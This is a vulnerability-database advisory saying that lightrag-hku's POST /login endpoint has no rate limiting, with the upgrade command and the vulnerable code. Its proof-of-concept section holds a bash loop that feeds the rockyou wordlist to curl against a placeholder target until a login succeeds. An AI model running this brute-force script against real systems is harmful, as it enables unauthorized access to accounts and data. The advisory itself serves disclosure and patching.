VDB
Sign up
CRITICAL9.1

GHSA-frch-4w6v-q5xx

lightrag-hku: No Rate Limiting on /login Endpoint Allows Brute-Force Attacks

Quick fix

GHSA-frch-4w6v-q5xx — lightrag-hku: upgrade to the fixed version with the command below.

pip install --upgrade 'lightrag-hku>=1.5.5'

Details

### Summary The POST /login endpoint has no rate limiting, account lockout, or delay on failed attempts. An attacker can submit unlimited password guesses at full network speed.

### Details

```python # lightrag/api/lightrag_server.py:2161 @app.post("/login") async def login(form_data: OAuth2PasswordRequestForm = Depends()): if not auth_handler.verify_password(username, form_data.password): raise HTTPException(status_code=401, detail="Incorrect credentials") # No: rate limit / lockout / backoff / CAPTCHA / attempt counter ```

A search for slowapi, rate_limit, lockout, or throttle in lightrag/api/ returns zero results.

### PoC

```bash # Brute-force /login with a wordlist, no throttling while IFS= read -r pass; do code=$(curl -s -o /dev/null -w "%{http_code}" \ -X POST http://<TARGET>:9621/login \ -d "username=admin&password=${pass}") [ "$code" = "200" ] && echo "[FOUND] $pass" && break done < /usr/share/wordlists/rockyou.txt ```

### Impact Improper restriction of authentication attempts. Any network-reachable attacker can brute-force user passwords without restriction. Once credentials are recovered, the attacker gains full authenticated access to all documents, knowledge graph, and administrative operations.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI/lightrag-hku
Introduced in: 0Fixed in: 1.5.5
Fixpip install --upgrade 'lightrag-hku>=1.5.5'

References